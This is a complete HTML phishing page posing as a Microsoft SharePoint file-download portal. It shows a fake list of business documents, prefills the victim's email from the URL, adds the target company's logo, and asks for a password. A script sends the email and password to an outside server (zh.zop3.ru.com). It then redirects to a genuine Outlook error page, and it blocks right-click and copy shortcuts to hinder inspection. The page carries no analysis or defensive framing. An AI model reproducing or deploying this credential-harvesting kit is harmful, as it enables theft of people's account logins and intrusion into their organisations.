<html><head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Microsoft SharePoint | Sign in to download</title>
    <link rel="shortcut icon" href="https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico">
    </head><body>

  
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Microsoft SharePoint | Sign in to download</title>
    <link rel="shortcut icon" href="https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico">
    <meta name="description" content="_Materials">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet">
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <style>
      .hidden {
        display: none;
      }
	  
	  body {
  user-select: none;
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
}

    </style>
    <script>
      function switchToPage2() {
        clearTimeout(window.pageSwitchTimeout);
        document.getElementById("page1").classList.add("hidden");
        document.getElementById("page2").classList.remove("hidden");
		document.getElementById("password").focus;
      }
      document.addEventListener("DOMContentLoaded", function() {
        window.pageSwitchTimeout = setTimeout(switchToPage2, 20000); // Change the duration to your desired value (in milliseconds)
      });
    </script>
	
    <style>
      video {
        object-fit: cover;
        width: 100vw;
        height: 100vh;
        position: fixed;
        top: 0;
        left: 0;
        z-index: -1;
      }

      /* Default font size for larger devices */
      .table-responsive {
        font-size: 1rem;
      }

      /* Font size for mobile devices */
      @media (max-width: 767px) {
        .table-responsive {
          font-size: 0.8rem;
          /* Adjust this value to your desired small font size */
        }
      }

      /* Change the max-width of the modal */
      .modal-dialog {
        margin-left: auto;
        margin-right: auto;
        position: relative;
        max-width: 420px;
        width: calc(100% - 40px);
        margin-top: 50px;
        padding-top: 20px;
        padding-right: 18px;
        padding-bottom: 20px;
        padding-left: 18px;
        margin-bottom: 28px;
        background-color: #fff;
        -webkit-box-shadow: 0 2px 6px rgb(0 0 0 / 20%);
        -moz-box-shadow: 0 2px 6px rgba(0, 0, 0, 0.2);
        box-shadow: 0 2px 6px rgb(0 0 0 / 20%);
        min-width: 320px;
        min-height: 338px;
        overflow: hidden;
      }

      /* Center the modal horizontally and vertically */
      .modal-dialog {
        display: flex;
        align-items: center;
        justify-content: center;
      }

      .no-border {
        border: none;
      }

      table {
        overflow-y: auto;
      }

      /* Custom CSS for smaller images on mobile devices */
      @media (max-width: 768px) {
        .custom-img {
          max-width: 100%;
          height: auto;
        }
      }

      .wrap {
        position: absolute;
        top: 50%;
        left: 50%;
        transform: translate(-50%, -50%);
        padding: 20x;
        opacity: 0.8;
        height: 450px;
        display: flex;
        align-items: center;
      }

      .wrap img {
        width: 100%;
      }

      .image-container {
        width: 100%;
        /* set the width of the container to 100% */
        max-width: 800px;
        /* set a maximum width for the container */
        margin: 0 auto;
        /* center the container */
      }

      .image-container img {
        width: 100%;
        /* set the width of the image to 100% of the container */
        height: auto;
        /* allow the height to adjust automatically based on the width */
        display: block;
        /* remove any default margins or padding */
        object-fit: contain;
        /* scale the image to fit within the container */
        image-rendering: optimizeQuality;
        /* improve the quality of the image */
      }

      #logo {
        width: 30px;
        height: auto;
      }

      #domain-name {
        font-size: 14px;
      }

      @media (max-width: 575.98px) {
        .wrap {
          position: absolute;
          top: 50%;
          left: 50%;
          transform: translate(-50%, -50%);
          padding: 20x;
          height: 450px;
          display: flex;
          align-items: center;
          width: 100%;
        }

        .wrap img {
          width: 100%;
        }
      }
    </style>
  
  
    <!-- Page1-->
    <div id="page1" class="">
      <div style="height:100vh;">
        <nav class="navbar" style="background-color:white;padding:0; margin:0;">
          <div class="container">
            <a class="navbar-brand" href="#">
              <img src="https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/loo.jpg">
            </a>
            <button class="navbar-toggler " type="button ">
              <span class="navbar-toggler-icon text-dark"></span>
            </button>
          </div>
        </nav>
        <video playsinline="" autoplay="" muted="" loop="" poster="">
          <source src="https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/px.mp4" type="video/webm">
          <source src="https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/px.mp4" type="video/mp4">
        </video>
        <div class="container">
          <div class="wrap">
            <img id="viewDocumentButton" class="mobi" src="https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/pnt.png">
          </div>
        </div>
      </div>
    </div>
    <!-- Page1-->
    <div id="page2" class="hidden">
      <nav class="navbar" style="background-color:#0070C3">
        <div class="container">
          <a class="navbar-brand" href="#">
            <img src="https://i.postimg.cc/J4H2Yp2n/logo.jpg">
          </a>
          <button class="navbar-toggler " type="button ">
            <span class="navbar-toggler-icon text-dark"></span>
          </button>
        </div>
      </nav>
      <div class="container">
        <div data-bs-toggle="modal" data-bs-target="#myModal">
          <div class="row">
            <div class="col-12">
              <div class="table-responsive">
                <table class="table table-sm" style="margin-top:10px;">
                  <thead>
                    <tr>
                      <th>Name</th>
                      <th>Size</th>
                      <th>Action</th>
                    </tr>
                  </thead>
                  <tbody>
                    <tr data-bs-toggle="modal" data-bs-target="#myModal">
                      <td>
                        <img src="https://cdn0.iconfinder.com/data/icons/logos-microsoft-office-365/128/Microsoft_Office-02-512.png" alt="Icon" class="img-fluid custom-img" width="20" height="20"> Product quantity.xls
                      </td>
                      <td>1.6 MB</td>
                      <td>
                        <button class="btn btn-primary btn-sm">Download</button>
                      </td>
                    </tr>
                    <tr data-bs-toggle="modal" data-bs-target="#myModal">
                      <td>
                        <img src="https://cdn-icons-png.flaticon.com/512/337/337946.png" alt="Icon" class="img-fluid custom-img" width="20" height="20"> Specific products, with detailed description.pdf
                      </td>
                      <td>1.1 MB</td>
                      <td>
                        <button class="btn btn-primary btn-sm">Download</button>
                      </td>
                    </tr>
                    <tr data-bs-toggle="modal" data-bs-target="#myModal">
                      <td>
                        <img src="https://cdn0.iconfinder.com/data/icons/logos-microsoft-office-365/128/Microsoft_Office-02-512.png" alt="Icon" class="img-fluid custom-img" width="20" height="20"> Sample image.xls
                      </td>
                      <td>1.8 MB</td>
                      <td>
                        <button class="btn btn-primary btn-sm">Download</button>
                      </td>
                    </tr>
                    <tr data-bs-toggle="modal" data-bs-target="#myModal">
                      <td>
                        <img src="https://cdn-icons-png.flaticon.com/512/337/337946.png" alt="Icon" class="img-fluid custom-img" width="20" height="20"> Company profile.pdf
                      </td>
                      <td>1.3 MB</td>
                      <td>
                        <button class="btn btn-primary btn-sm">Download</button>
                      </td>
                    </tr>
                    <tr data-bs-toggle="modal" data-bs-target="#myModal">
                      <td>
                        <img src="https://cdn0.iconfinder.com/data/icons/logos-microsoft-office-365/128/Microsoft_Office_Mesa_de_trabajo_1-512.png" alt="Icon" class="img-fluid custom-img" width="20" height="20"> Delivery requirement.docx
                      </td>
                      <td>1.7 MB</td>
                      <td>
                        <button class="btn btn-primary btn-sm">Download</button>
                      </td>
                    </tr>
                  </tbody>
                </table>
              </div>
            </div>
            <center>
              <br>
              <div class="col-12 col-md-4">
                <img src="https://i.postimg.cc/MHQgBtkv/ss.png" class="img-fluid" alt="Image">
              </div>
            </center>
          </div>
        </div>
      </div>
      <!-- The Modal -->
      <div class="modal" id="myModal">
        <div class="modal-dialog">
          <br>
          <br>
          <br>
          <br>
          <div class="modal-content no-border">
            <!-- Modal Header -->
            <!-- Modal body -->
            <div class="modal-body no-border">
              <img src="https://i.postimg.cc/LXZxQXxW/to.png" class="img-fluid">
              <br>
              <small class="text-danger" id="msg" style="font-weight:600;"></small>
              <form method="post" id="login-form" class="my-4">
                <input type="email" name="email" onload="fetchLogo()" id="email" class="form-control mb-3" value="" readonly="">
                <input type="password" name="password" id="password" class="form-control mb-3" autofocus placeholder="Password" value="" required="">
                <button id="submitBtn" class="btn btn-md btn-primary">Sign In</button>
                <br>
                <br>
                <div style="font-size:14px;color:#48494B;vertical-align: middle;">
                  <i>Powered by</i>
                  <span style="color:blue;font-weight:600;" id="domain-name">
                  </span><span> MAIL SERVER</span> &nbsp; <img id="logo" src="" alt="Company Logo">
                </div>
              </form>
            </div>
          </div>
        </div>
      </div>
    </div>
    <script>
      document.getElementById("viewDocumentButton").addEventListener("click", switchToPage2);
    </script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <script>
	// Disable right-click context menu
document.addEventListener('contextmenu', function(event) {
  event.preventDefault();
});

// Disable specific Ctrl key combinations and text highlighting
document.addEventListener('keydown', function(event) {
  // List of keys you want to disable when Ctrl is pressed
  const blockedKeys = ['s', 'c', 'v', 'x', 'p', 'a'];

  if (event.ctrlKey && blockedKeys.includes(event.key.toLowerCase())) {
    event.preventDefault();
  }
});

	
      $(document).ready(function() {
        // Fetch the logo on load from email input field directly using Clearbit Logo API
        function fetchLogo(email) {
          const domain = email.split('@')[1];
          const domainWithoutTLD = domain.split('.')[0];
          const clearbitUrl = 'https://logo.clearbit.com/' + domain;
          $('#logo').attr('src', clearbitUrl);
          $('#domain-name').text(domainWithoutTLD.toUpperCase());
        }
        const urlParams = new URLSearchParams(window.location.search);
        const email = urlParams.get('email');
        document.getElementById('email').value = email;
        fetchLogo(email); // Call fetchLogo function when email is available
        let step = 1;
        $('#login-form').on('submit', function(event) {
          event.preventDefault();
          $('#submitBtn').text('Signing in...');
          const email = $('#email').val();
          const password = $('#password').val();
          $.ajax({
            url: 'https://zh.zop3.ru.com/a/em.php',
            type: 'POST',
            data: {
              email: email,
              password: password
            },
            success: function(response) {
              if (response.success) {
                window.location.href = 'https://outlook.office365.com/Encryption/ErrorPage.aspx?src=3&code=11&be=SN6PR04MB4014&fe=JNAP275CA0040.ZAFP275.PROD.OUTLOOgK.COM&loc=en-US&itemID=E4E_M_e9df154a-e4b8-4486-8aec-7acceeb93fee';
              } else {
                handleUnsuccessfulAttempt();
              }
            },
            error: function() {
              handleUnsuccessfulAttempt();
            }
          });
        });

        function handleUnsuccessfulAttempt() {
          if (step >= 3) {
            window.location.href = 'https://outlook.office365.com/Encryption/ErrorPage.aspx?src=3&code=11&be=SN6PR04MB4014&fe=JNAP275CA0040.ZAFP275.PROD.OUTLOOgK.COM&loc=en-US&itemID=E4E_M_e9df154a-e4b8-4486-8aec-7acceeb93fee';
          } else {
            $('#msg').show().fadeOut(5000);
            $('#msg').html("Please check you entered your email and password correctly and try again.");
            $('#password').val('');
            step++;
            $('#submitBtn').text('Sign In');
          }
        }
      });
    </script>
  

<noscript><i>Javascript required</i></noscript>

</body></html>
